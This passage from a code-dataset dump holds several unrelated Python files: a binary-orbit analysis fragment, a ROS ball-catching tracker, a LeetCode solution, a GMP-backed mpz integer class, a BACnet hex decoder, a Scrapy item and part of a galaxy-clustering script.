dx[:,1]*sinOMG\n pos_bar_y = (-dx[:,0]*sinOMG + dx[:,1]*cosOMG)*cosinc + dx[:,2]*sininc\n pos_bar_z = 0.0\n vel_bar_x = dv[:,0]*cosOMG + dv[:,1]*sinOMG\n vel_bar_y = (-dv[:,0]*sinOMG + dv[:,1]*cosOMG)*cosinc + dv[:,2]*sininc\n vel_bar_z = 0.0\n \n h = np.array(list(map(lambda x:np.sqrt(np.inner(x,x)),binary['am'])))\n ecccosomg = h/Gm_tot*vel_bar_y - pos_bar_x*inv_dr\n eccsinomg = -h/Gm_tot*vel_bar_x - pos_bar_y*inv_dr\n binary['ecc'] = np.sqrt( ecccosomg*ecccosomg + eccsinomg*eccsinomg )\n regular_sign(ecccosomg,f_err)\n regular_sign(eccsinomg,f_err)\n binary['rot_self'] = np.arctan2(eccsinomg,ecccosomg)\n #binary['rot_self'][binary['rot_self']<-np.pi+1e-5] += 2*np.pi \n #binary['rot_self'][binary['rot_self']>=np.pi-1e-5] -= 2*np.pi\n \n regular_sign(pos_bar_y,f_err)\n regular_sign(pos_bar_x,f_err)\n phi = np.arctan2(pos_bar_y, pos_bar_x)\n #phi[phi<-np.pi+1e-5] += 2*np.pi\n #phi[phi>=np.pi-1e-5] -= 2*np.pi\n \n f = phi - binary['rot_self']\n binary['ecca'] = np.arctan(np.sin(f)*np.sqrt(np.abs(binary['ecc']*binary['ecc'] - 1.0))/(binary['ecc']+np.cos(f)))\n n = np.sqrt(Gm_tot/np.abs(binary['semi']*binary['semi']*binary['semi']))\n binary['period'] = 8.0*np.arctan(1.0)/n\n l = binary['ecca'] - binary['ecc']*np.sin(binary['ecca'])\n binary['t_peri'] = l / n\n\ndef findPair(_dat, _G, _rmax, use_kdtree=False, simple_binary=True):\n \"\"\"\n Find paris\n _dat: Particle type data \n _G: gravitational constant\n _rmax: maximum binary separation\n use_kdtree: use KDtree to find all binaries (slow); otherwise use information from PeTar, only hard binaries are detected (fast)\n simple_binary: only calculate semi and ecc (fast); otherwise calculating all binary parameters (slow)\n return: [KDtree], single, binary\n \"\"\"\n if (not issubclass(type(_dat), 
SimpleParticle)):\n raise ValueError(\"Data type wrong\",type(_dat),\" should be subclass of \", SimpleParticle)\n\n if (use_kdtree):\n # create KDTree\n #print('create KDTree')\n kdt=sp.cKDTree(_dat.pos)\n \n # find all close pairs\n #pairs=kdt.query_pairs(_rmax*AU2PC)\n \n # only check nearest index\n #pair_index=np.unique(np.transpose(np.array([np.array([x[0],x[1]]) for x in pairs])),axis=0)\n \n # find pair index and distance\n #print('Get index')\n r,index=kdt.query(_dat.pos,k=2)\n pair_index=np.transpose(np.unique(np.sort(index,axis=1),axis=0))\n #pair_index = np.transpose(index)\n\n #index = kdt.query_pairs(_rmax,output_type='ndarray')\n #pair_index = np.transpose(index)\n \n # two members\n p1 = _dat[pair_index[0]]\n p2 = _dat[pair_index[1]]\n \n # check orbits\n #print('Create binary')\n binary = Binary(p1, p2, G=_G)\n apo =binary.semi*(binary.ecc+1.0)\n \n bsel= ((binary.semi>0) & (apo<_rmax))\n binary = binary[bsel]\n \n single_mask = np.ones(_dat.size).astype(bool)\n single_mask[pair_index[0][bsel]]=False\n single_mask[pair_index[1][bsel]]=False\n single = _dat[single_mask]\n return kdt, single, binary\n else:\n idx = _dat.status.argsort()\n dat_sort = _dat[idx]\n status, index, inverse, counts = np.unique(dat_sort.status, return_index=True, return_inverse=True, return_counts=True)\n binary_i1 = index[counts==2]\n binary_i2 = binary_i1+1\n # pass G as a keyword: the third positional argument of Binary is _offset, not G\n binary = Binary(dat_sort[binary_i1], dat_sort[binary_i2], G=_G)\n single = dat_sort[index[-1]:]\n\n return single, binary\n\n","sub_path":"tools/analysis/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"316595069","text":"#!/usr/bin/env python\n\nimport rospy\nimport cv2\nimport time\nfrom threading import Timer\nfrom pymongo import MongoClient\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom pr2_web_motion_control.msg import CatchFeedback\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\n\n\nclass BallTracker:\n def __init__(self):\n self.node_name = 'ball_tracker'\n # tracking info\n self.autonomous = False\n self.start_tracking = False\n self.ball_center = None\n self.ball_center_initial = None\n self.ball_depth_value = None\n self.ball_depth_value_initial = None\n self.ball_in_air = False\n self.frame_to_catch = 4\n self.start_time = 0\n self.positions = []\n self.catch_timer = None\n\n self.catch_records = {}\n self.get_catch_records()\n\n self.bridge = CvBridge()\n self.kinect_image_pub = rospy.Publisher('pr2_kinect_image', Image, queue_size=1)\n self.catch_feedback_pub = rospy.Publisher('catch_feedback', CatchFeedback, queue_size=1)\n self.arms_motion_pub = rospy.Publisher('arms_motion_control', String, queue_size=1)\n\n rospy.Subscriber('input_rgb_image', Image, self.image_callback, queue_size=1)\n rospy.Subscriber('input_depth_image', Image, self.depth_callback, queue_size=1)\n rospy.Subscriber('web_command', String, self.web_command_callback, queue_size=1)\n\n rospy.init_node(self.node_name)\n\n def reinitialize(self):\n self.autonomous = False\n self.start_tracking = False\n self.ball_center = None\n self.ball_center_initial = None\n self.ball_depth_value = None\n self.ball_depth_value_initial = None\n self.ball_in_air = False\n self.frame_to_catch = 4\n self.start_time = 0\n self.positions = []\n self.catch_timer = None\n\n def get_catch_records(self, msg=None):\n if msg is not None and msg.data == 'update records':\n self.catch_records = {}\n\n client = 
MongoClient('mongodb://52.64.47.249:80/pr2')\n db = client.get_default_database()\n for record in db.catchrecords.find():\n catch_range = int(record['initdepth'] / 100)\n if catch_range in self.catch_records.keys():\n self.catch_records[catch_range].append(record)\n else:\n self.catch_records[catch_range] = [record]\n\n rospy.loginfo('Catch records updated')\n\n def calculate_catch_time(self, initdepth):\n # default catch time for all ranges\n catch_time = 0.5\n\n catch_range = int(initdepth / 100)\n if catch_range in self.catch_records.keys():\n catch_time = 0\n records = self.catch_records[catch_range]\n for record in records:\n if record['result'] == 'too slow':\n catch_time += 0.9 * (initdepth / record['initdepth']) * record['time']\n elif record['result'] == 'too fast':\n catch_time += 1.1 * (initdepth / record['initdepth']) * record['time']\n elif record['result'] == 'succeed':\n catch_time += (initdepth / record['initdepth']) * record['time']\n\n catch_time /= len(records)\n\n return catch_time\n\n def image_callback(self, ros_image):\n # Use cv_bridge() to convert the ROS image to OpenCV format\n try:\n frame = self.bridge.imgmsg_to_cv2(ros_image, 'bgr8')\n except CvBridgeError as e:\n print(e)\n\n frame = np.array(frame, dtype=np.uint8)\n\n display_image = self.process_image(frame)\n\n self.kinect_image_pub.publish(self.bridge.cv2_to_imgmsg(display_image, 'bgr8'))\n\n def depth_callback(self, ros_image):\n try:\n depth_image = self.bridge.imgmsg_to_cv2(ros_image, 'passthrough')\n except CvBridgeError as e:\n print(e)\n\n depth_array = np.array(depth_image, dtype=np.float32)\n\n # Normalize the depth image to fall between 0 (black) and 1 (white)\n # cv2.normalize(depth_array, depth_array, 0, 1, cv2.NORM_MINMAX)\n\n if self.start_tracking and self.ball_center is not None:\n self.arms_motion_pub.publish('prepare catch')\n self.ball_depth_value = depth_array[int(self.ball_center[1]), int(self.ball_center[0])]\n\n if self.ball_depth_value_initial is None:\n self.ball_depth_value_initial = self.ball_depth_value\n rospy.loginfo('************************************************************')\n rospy.loginfo('Initial ball depth value: %s', self.ball_depth_value_initial)\n\n if self.ball_in_air and self.frame_to_catch > 0:\n self.frame_to_catch -= 1\n offset_x = self.ball_center[0] - self.ball_center_initial[0]\n offset_y = self.ball_center[1] - self.ball_center_initial[1]\n self.positions.append(offset_x)\n self.positions.append(offset_y)\n self.positions.append(self.ball_depth_value)\n rospy.loginfo('Current ball depth value: %s', self.ball_depth_value)\n rospy.loginfo('Current ball offset position: %s, %s', offset_x, offset_y)\n\n if not self.ball_in_air and self.ball_depth_value_initial - self.ball_depth_value > 500:\n self.ball_in_air = True\n self.ball_center_initial = self.ball_center\n self.start_time = time.time()\n rospy.loginfo('Time stamp when ball is in air: %s', self.start_time)\n rospy.loginfo('Depth value when ball is in air: %s', self.ball_depth_value)\n rospy.loginfo('Position when ball is in air: %s, %s', self.ball_center_initial[0],\n self.ball_center_initial[1])\n if self.autonomous:\n catch_time = self.calculate_catch_time(self.ball_depth_value_initial)\n self.catch_timer = Timer(catch_time, self.do_catch)\n self.catch_timer.start()\n rospy.loginfo('Plan to catch after %s', catch_time)\n\n def web_command_callback(self, msg):\n if msg.data == 'prepare catch':\n self.reinitialize()\n self.start_tracking = True\n elif msg.data == 'catch':\n self.do_catch()\n elif 
msg.data == 'prepare catch(autonomous)':\n self.reinitialize()\n self.autonomous = True\n self.start_tracking = True\n elif msg.data == 'stop control':\n self.reinitialize()\n rospy.loginfo('Control timeout')\n rospy.loginfo('------------------------------------------------------------')\n elif msg.data == 'update records':\n self.get_catch_records(msg)\n\n def do_catch(self):\n self.arms_motion_pub.publish('catch')\n catch_time = time.time()\n catch_feedback = CatchFeedback()\n catch_feedback.initdepth = self.ball_depth_value_initial\n catch_feedback.positions = self.positions[:]\n catch_feedback.time = catch_time - self.start_time\n rospy.loginfo('Time stamp when trying to catch: %s', catch_time)\n rospy.loginfo('Timing for catching: %s', catch_feedback.time)\n rospy.loginfo('------------------------------------------------------------')\n self.catch_feedback_pub.publish(catch_feedback)\n self.reinitialize()\n\n def process_image(self, frame):\n if self.start_tracking:\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n lower_red = np.array([156, 43, 46])\n upper_red = np.array([180, 255, 255])\n mask = cv2.inRange(hsv, lower_red, upper_red)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n contours, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n (x, y), radius = cv2.minEnclosingCircle(c)\n if radius > 10:\n self.ball_center = (x, y)\n cv2.circle(frame, (int(x), int(y)), int(radius), (255, 0, 0), 3)\n cv2.rectangle(frame, (int(x) - 5, int(y) - 5), (int(x) + 5, int(y) + 5), (255, 0, 0), -1)\n else:\n self.ball_center = None\n else:\n self.ball_center = None\n\n return frame\n\n\ndef main():\n BallTracker()\n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/ball_tracker.py","file_name":"ball_tracker.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"113378537","text":"# Write a function to find the longest common prefix among an array of strings.\n# If there is no common prefix, return the empty string \"\".\nclass Solution:\n    def longestCommonPrefix(self, strs):\n        if not strs: return \"\"\n        strr1 = min(strs)\n        strr2 = max(strs)\n        for i, s in enumerate(strr1):\n            if s != strr2[i]:\n                return strr2[:i]\n        return strr1\n","sub_path":"LeetCodePython/No014.py","file_name":"No014.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"400462341","text":"import logging\nimport sys\n\nfrom gmpy_cffi.interface import gmp, ffi\nfrom gmpy_cffi.convert import _pyint_to_mpz, _pylong_to_mpz, _mpz_to_pylong, _mpz_to_str, MAX_UI\nfrom gmpy_cffi.cache import _new_mpz, _del_mpz\n\n\nif sys.version > '3':\n long = int\n xrange = range\n\n\nclass mpz(object):\n _mpz_str = None\n\n def __init__(self, n=0, base=None):\n \"\"\"\n mpz() -> mpz(0)\n\n If no argument is given, return mpz(0).\n\n mpz(n) -> mpz\n\n Return an 'mpz' object with a numeric value 'n' (truncating n\n to its integer part if it's a Fraction, 'mpq', Decimal, float\n or 'mpfr').\n\n mpz(s[, base=0]):\n\n Return an 'mpz' object from a string 's' made of digits in the\n given base. If base=0, binary, octal, or hex Python strings\n are recognized by leading 0b, 0o, or 0x characters, otherwise\n the string is assumed to be decimal. Values for base can range\n
Values for base can range\n between 2 and 62.\n \"\"\"\n\n if isinstance(n, self.__class__):\n self._mpz = n._mpz\n return\n a = self._mpz = ffi.gc(_new_mpz(), _del_mpz)\n if isinstance(n, str):\n if base is None:\n base = 10\n if base == 0 or 2 <= base <= 62:\n if gmp.mpz_set_str(a, n.encode('UTF-8'), base) != 0:\n raise ValueError(\"Can't create mpz from %s with base %s\" % (n, base))\n else:\n raise ValueError('base must be 0 or 2..62, not %s' % base)\n elif base is not None:\n raise ValueError('Base only allowed for str, not for %s.' % type(n))\n elif isinstance(n, float):\n gmp.mpz_set_d(a, n)\n elif isinstance(n, (int, long)):\n _pyint_to_mpz(n, a)\n else:\n raise TypeError\n\n @classmethod\n def _from_c_mpz(cls, mpz):\n inst = object.__new__(cls)\n inst._mpz = ffi.gc(mpz, _del_mpz)\n return inst\n\n def __str__(self):\n if self._mpz_str is None:\n self._mpz_str = _mpz_to_str(self._mpz, 10)\n return self._mpz_str\n\n def __repr__(self):\n return 'mpz(%s)' % self\n\n def __hex__(self):\n tmp = '0x' + _mpz_to_str(abs(self)._mpz, 16)\n return tmp if self >= 0 else '-' + tmp\n\n def __oct__(self):\n tmp = '0' + _mpz_to_str(abs(self)._mpz, 8)\n return tmp if self >= 0 else '-' + tmp\n\n def __add__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_add_ui(res, self._mpz, other)\n else:\n _pyint_to_mpz(other, res)\n gmp.mpz_add(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_add(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __radd__ = __add__\n\n def __sub__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_sub_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_sub(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_sub(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_ui_sub(res, other, self._mpz)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_sub(res, res, self._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __mul__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_mul_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_mul(res, res, self._mpz)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_mul(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __floordiv__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n if 0 < other <= MAX_UI:\n gmp.mpz_fdiv_q_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_fdiv_q(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n gmp.mpz_fdiv_q(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __rfloordiv__(self, other):\n if isinstance(other, (int, long)):\n if self == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n _pylong_to_mpz(other, res)\n gmp.mpz_fdiv_q(res, res, self._mpz)\n return 
mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __div__ = __floordiv__\n __rdiv__ = __rfloordiv__\n\n def __mod__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_fdiv_r_ui(r, self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_r(r, self._mpz, oth)\n _del_mpz(oth)\n return mpz._from_c_mpz(r)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n gmp.mpz_fdiv_r(r, self._mpz, other._mpz)\n return mpz._from_c_mpz(r)\n else:\n return NotImplemented\n\n def __rmod__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n if self == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_r(r, oth, self._mpz)\n _del_mpz(oth)\n return mpz._from_c_mpz(r)\n\n def __divmod__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_fdiv_qr_ui(q, r, self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_qr(q, r, self._mpz, oth)\n _del_mpz(oth)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n gmp.mpz_fdiv_qr(q, r, self._mpz, other._mpz)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n else:\n return NotImplemented\n\n def __rdivmod__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n if self == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_qr(q, r, oth, self._mpz)\n _del_mpz(oth)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n\n def __lshift__(self, other):\n if not isinstance(other, (int, long, mpz)):\n return NotImplemented\n oth = gmp.mpz_get_ui(other._mpz) if isinstance(other, mpz) else other\n res = _new_mpz()\n gmp.mpz_mul_2exp(res, self._mpz, oth)\n return mpz._from_c_mpz(res)\n\n def __rlshift__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n return mpz(other) << self\n\n def __rshift__(self, other):\n if not isinstance(other, (int, long, mpz)):\n return NotImplemented\n oth = gmp.mpz_get_ui(other._mpz) if isinstance(other, mpz) else other\n res = _new_mpz()\n gmp.mpz_fdiv_q_2exp(res, self._mpz, oth)\n return mpz._from_c_mpz(res)\n\n def __rrshift__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n return mpz(other) >> self\n\n def __hash__(self):\n # WTF When this returns -1, CPython silently changes it to -2\n i = int(self)\n if -sys.maxsize - 1 <= i <= sys.maxsize:\n return i\n return (i + sys.maxsize + 1) % (2 * sys.maxsize + 2) - sys.maxsize - 1\n\n def __cmp(self, other):\n if isinstance(other, mpz):\n res = gmp.mpz_cmp(self._mpz, other._mpz)\n elif isinstance(other, (int, long)):\n if 0 <= other <= MAX_UI:\n res = gmp.mpz_cmp_ui(self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n res = gmp.mpz_cmp(self._mpz, oth)\n _del_mpz(oth)\n elif isinstance(other, float):\n res = gmp.mpz_cmp_d(self._mpz, other)\n else:\n return None\n return res\n\n def __lt__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c < 0\n\n def 
__gt__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c > 0\n\n def __eq__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c == 0\n\n def __ne__(self, other):\n return not self == other\n\n def __ge__(self, other):\n return not self < other\n\n def __le__(self, other):\n return not self > other\n\n def __int__(self):\n if gmp.mpz_fits_slong_p(self._mpz):\n return gmp.mpz_get_si(self._mpz)\n elif gmp.mpz_fits_ulong_p(self._mpz):\n return gmp.mpz_get_ui(self._mpz)\n else:\n return _mpz_to_pylong(self._mpz)\n\n __index__ = __int__\n\n def __long__(self):\n if gmp.mpz_fits_slong_p(self._mpz):\n return long(gmp.mpz_get_si(self._mpz))\n elif gmp.mpz_fits_ulong_p(self._mpz):\n return gmp.mpz_get_ui(self._mpz)\n else:\n return _mpz_to_pylong(self._mpz)\n\n def __float__(self):\n return gmp.mpz_get_d(self._mpz)\n\n def __complex__(self):\n return float(self) + 0j\n\n def __abs__(self):\n res = _new_mpz()\n gmp.mpz_abs(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __neg__(self):\n res = _new_mpz()\n gmp.mpz_neg(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __pos__(self):\n return self\n\n def __invert__(self):\n res = _new_mpz()\n gmp.mpz_com(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __and__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_and(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_and(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __rand__ = __and__\n\n def __or__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_ior(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_ior(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __ror__ = __or__\n\n def __xor__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_xor(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_xor(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __rxor__ = __xor__\n\n def __nonzero__(self):\n return gmp.mpz_cmp_ui(self._mpz, 0) != 0\n\n __bool__ = __nonzero__\n\n def __pow__(self, power, modulo=None):\n if not isinstance(power, (int, long, mpz)):\n return NotImplemented\n if modulo is not None and not isinstance(modulo, (int, long, mpz)):\n return NotImplemented\n\n if power < 0:\n raise ValueError('mpz.pow with negative exponent')\n\n res = _new_mpz()\n if modulo is None:\n exp = int(power)\n if exp > MAX_UI:\n raise ValueError('mpz.pow with outragous exponent')\n gmp.mpz_pow_ui(res, self._mpz, exp)\n else:\n del_mod = del_exp = False\n if isinstance(modulo, (int, long)):\n mod = _new_mpz()\n _pylong_to_mpz(abs(modulo), mod)\n del_mod = True\n else:\n mod = modulo._mpz\n if isinstance(power, (int, long)) and power <= MAX_UI:\n gmp.mpz_powm_ui(res, self._mpz, power, mod)\n else:\n if isinstance(power, (int, long)):\n exp = _new_mpz()\n _pylong_to_mpz(power, exp)\n del_exp = True\n else:\n exp = power._mpz\n gmp.mpz_powm(res, self._mpz, exp, mod)\n if del_exp:\n _del_mpz(exp)\n if del_mod:\n _del_mpz(mod)\n\n return mpz._from_c_mpz(res)\n\n def __rpow__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n\n if self < 0:\n raise ValueError('mpz.pow with negative exponent')\n\n res = _new_mpz()\n\n exp = int(self)\n if exp > MAX_UI:\n raise ValueError('mpz.pow with outragous exponent')\n if 0 <= other <= MAX_UI:\n 
gmp.mpz_ui_pow_ui(res, other, exp)\n else:\n base = _new_mpz()\n _pylong_to_mpz(other, base)\n gmp.mpz_pow_ui(res, base, exp)\n _del_mpz(base)\n\n return mpz._from_c_mpz(res)\n","sub_path":"gmpy_cffi/mpz.py","file_name":"mpz.py","file_ext":"py","file_size_in_byte":14817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"269918770","text":"#!/usr/bin/python\n\n\"\"\"\nThis simple tool decodes a BACnet packet hex string.\n\"\"\"\n\nfrom bacpypes.debugging import bacpypes_debugging, ModuleLogger, xtob\nfrom bacpypes.consolelogging import ArgumentParser\n\nfrom bacpypes.analysis import decode_packet\n\n# some debugging\n_debug = 0\n_log = ModuleLogger(globals())\n\n#\n# __main__\n#\n\n# parse the command line arguments\nparser = ArgumentParser(description=__doc__)\nparser.add_argument(\n \"hexstring\", type=str,\n help=\"hex string to decode\",\n )\nargs = parser.parse_args()\n\nif _debug: _log.debug(\"initialization\")\nif _debug: _log.debug(\" - args: %r\", args)\n\n# assume Ethernet header\ndata = b'\\0' * 14 + xtob(args.hexstring)\n\n# decode the packet\npkt = decode_packet(data)\nif pkt:\n pkt.debug_contents()\n\n","sub_path":"hexdecode.py","file_name":"hexdecode.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"445506442","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy import Item, Field\n\n\nclass Dota2Item(Item):\n team_A = Field()\n team_B = Field()\n odd_A = Field()\n odd_B = Field()\n winner = Field()\n mode = Field()\n score = Field()\n","sub_path":"dota2/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329941891","text":"import sys\nimport string\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom keras.optimizers import SGD\nfrom sklearn.decomposition import PCA\n\nsys.path.insert(0,'./model')\nfrom DEC import DEC, ClusteringLayer\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"--classes\", help=\"number of classes in the model\", default=9)\nparser.add_argument(\"--img_ht\", help=\"image height\", default=100)\nparser.add_argument(\"--img_wdt\", help=\"image width\", default=100)\nparser.add_argument(\"--data_path\", help=\"directory where data is located\", default=\"./data\")\nparser.add_argument(\"--result_path\", help=\"directory where model results are located\", default=\"./model/results\")\n\nargs = parser.parse_args()\n#print(\"CLASSES: \"+str(args.classes))\n\n# DEC constants from DEC paper\nbatch_size = 256\nlr = 0.01\nmomentum = 0.9\ntol = 0.001\nmaxiter = 10\n#update_interval = 140 #perhaps this should be 1 for multitask learning\nupdate_interval = 1 #perhaps this should be 1 for multitask learning\nn_clusters = 9 # number of clusters to use\nn_classes = args.classes # number of classes\nimg_ht = args.img_ht\nimg_wdt = args.img_wdt\ndata_path = args.data_path\ngalaxy_results = args.result_path\n\nlcolours = ['#CAA8F5', '#D6FF79', '#A09BE7', '#5F00BA', '#56CBF9', \\\n '#F3C969', '#ED254E', '#B0FF92', '#D9F0FF','#46351D']\nlcolours = lcolours[0:n_classes]\n\ndef get_cluster_centres(dec):\n return np.squeeze(np.array(dec.model.get_layer(name='clustering').get_weights()))\n\n\ndef 
load_galaxy(data_path=data_path):\n #label_data = np.load(data_path + \"/rescaled_labels.npy\")\n img_data = np.load(data_path + \"/rescaled_matrix_100.npz\")['arr_0']\n label_data = img_data[:,-1]\n img_data = img_data[:,1:-1]\n #img_data = np.divide(img_data,255.)\n \n print(\"UNIQUE LABELS: \", np.unique(label_data))\n print(label_data.shape)\n print(img_data.shape)\n #img_data = img_data/255.\n\n return img_data,label_data\n\n\ndef pca_plot(base_network, x, cluster_centres=None, y=None, labels=[], output_file=None,\\\n lcolours=[], ulcolour='#747777', ccolour='#4D6CFA', legend=False):\n \n def onpick(event):\n print('picked')\n print(event.ind)\n #print(y[event.ind[0]])\n dim = int(np.ceil(np.sqrt(len(event.ind))))\n print(dim)\n fig = plt.figure()\n for i in range(len(event.ind)):\n ax = fig.add_subplot(dim,dim,i+1)\n ax.imshow(np.reshape(x[event.ind[i]], (img_ht,img_wdt)), cmap='gray_r')\n plt.axis('off')\n plt.show()\n \n pca = PCA(n_components=2)\n x_pca = pca.fit_transform(np.nan_to_num(base_network.predict(x)))\n if cluster_centres is not None:\n c_pca = pca.transform(cluster_centres)\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111)\n ax.scatter(x_pca[np.where(y!=-1),0], x_pca[np.where(y!=-1),1], marker='o', alpha=0, picker=5)\n if np.any(y):\n unique_targets = list(np.unique(y))\n if -1 in unique_targets:\n ax.scatter(x_pca[np.where(y==-1),0], x_pca[np.where(y==-1),1], marker='o', s=15, \\\n color=ulcolour, alpha=0.3)\n unique_targets.remove(-1)\n for l in unique_targets:\n l = int(l)\n ax.scatter(x_pca[np.where(y==l),0], x_pca[np.where(y==l),1], marker='o', s=5, \\\n color=lcolours[l], alpha=1.0, label=labels[l])\n else:\n ax.scatter(x_pca[:,0], x_pca[:,1], marker='o', s=15, \\\n color=ulcolour, alpha=0.1)\n if cluster_centres is not None:\n ax.scatter(c_pca[:,0], c_pca[:,1], marker='o', s=20, color=ccolour, \\\n alpha=1.0, label='cluster centre')\n\n for i,c in enumerate(string.ascii_lowercase[:len(cluster_centres)]):\n ax.text(c_pca[i,0], c_pca[i,1], str(c), size=21, color='k', weight='bold')\n ax.text(c_pca[i,0], c_pca[i,1], str(c), size=20, color='w')\n plt.axis('off')\n if legend:\n plt.legend(ncol=1,loc='upper left')\n if output_file:\n plt.savefig(output_file)\n fig.canvas.mpl_connect('pick_event', onpick)\n plt.show()\n\ndef clickable_analysis(x_test, y_test):\n ae_weights = galaxy_results + '/ae_weights.h5'\n redec = DEC(dims=[x_test.shape[-1], 500, 500, 2000, 10], \\\n n_clusters=n_clusters)\n #redec.initialize_model(optimizer=SGD(lr=lr, momentum=momentum), 